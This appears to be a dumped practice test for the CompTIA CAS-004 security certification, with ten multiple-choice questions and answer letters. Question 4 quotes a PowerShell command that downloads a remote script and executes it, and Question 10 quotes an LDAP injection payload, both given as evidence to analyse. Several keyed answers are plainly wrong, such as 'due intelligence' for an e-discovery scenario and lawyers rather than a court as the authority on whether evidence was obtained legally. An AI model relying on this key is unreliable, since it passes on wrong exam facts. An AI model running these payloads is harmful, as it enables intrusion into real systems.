comptia cas-004 online test

Question 1

A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who
are no longer with the organization. The legal department provided the security team with a list of search terms to
investigate.
This is an example of:

• A. due intelligence
• B. e-discovery.
• C. due care.
• D. legal hold.

Answer:

A

Explanation:
Reference: https://www.ansarada.com/due-diligence/hr

Question 2

A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to
investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.
Which of the following is the NEXT step of the incident response plan?

• A. Remediation
• B. Containment
• C. Response
• D. Recovery

Answer:

B

Explanation:
Reference: https://www.sciencedirect.com/topics/computer-science/containment-strategy

Question 3

An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During
the last two holiday seasons, the server experienced performance issues because of too many connections, and several
customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this
kind of performance issue.
Which of the following is the MOST cost-effective solution?

• A. Move the server to a cloud provider.
• B. Change the operating system.
• C. Buy a new server and create an active-active cluster.
• D. Upgrade the server with a new one.

Answer:

A

Question 4

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server.
During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell IEX(New-Object Net.WebClient).DownloadString (https://content.comptia.org/casp/whois.psl);whois
Which of the following security controls would have alerted and prevented the next phase of the attack?

• A. Antivirus and UEBA
• B. Reverse proxy and sandbox
• C. EDR and application approved list
• D. Forward proxy and MFA

Answer:

D

Question 5

The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security
program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?

• A. Software composition analysis
• B. Code obfuscation
• C. Static analysis
• D. Dynamic analysis

Answer:

D

Question 6

An organization is implementing a new identity and access management architecture with the following objectives:
Supporting MFA against on-premises infrastructure

Improving the user experience by integrating with SaaS applications

Applying risk-based policies based on location Performing just-in-time provisioning


Which of the following authentication protocols should the organization implement to support these requirements?

• A. Kerberos and TACACS
• B. SAML and RADIUS
• C. OAuth and OpenID
• D. OTP and 802.1X

Answer:

A

Explanation:
Reference: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/migrate-application-authentication-to-
azure-active-directory

Question 7

A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?

• A. Lawyers
• B. Court
• C. Upper management team
• D. Police

Answer:

A

Question 8

A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that
an important legacy embedded system gathers SNMP information from various devices. The system can only be managed
through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the
moment.
Which of the following should the security administrator do to mitigate the risk?

• A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.
• B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management.
• C. Suggest that the networking team contact the original embedded systems vendor to get an update to the system that does not require Flash.
• D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.

Answer:

D

Question 9

Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel
were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last
backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data
classification is 24 hours.
Based on RPO requirements, which of the following recommendations should the management team make?

• A. Leave the current backup schedule intact and pay the ransom to decrypt the data.
• B. Leave the current backup schedule intact and make the human resources fileshare read-only.
• C. Increase the frequency of backups and create SIEM alerts for IOCs.
• D. Decrease the frequency of backups and pay the ransom to decrypt the data.

Answer:

C

Question 10

A security analyst discovered that the companys WAF was not properly configured. The main web server was breached,
and the following payload was found in one of the malicious requests:
(&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin))
Which of the following would BEST mitigate this vulnerability?

• A. Network intrusion prevention
• B. Data encoding
• C. Input validation
• D. CAPTCHA

Answer:

C

Explanation:
Reference: https://book.hacktricks.xyz/pentesting-web/ldap-injection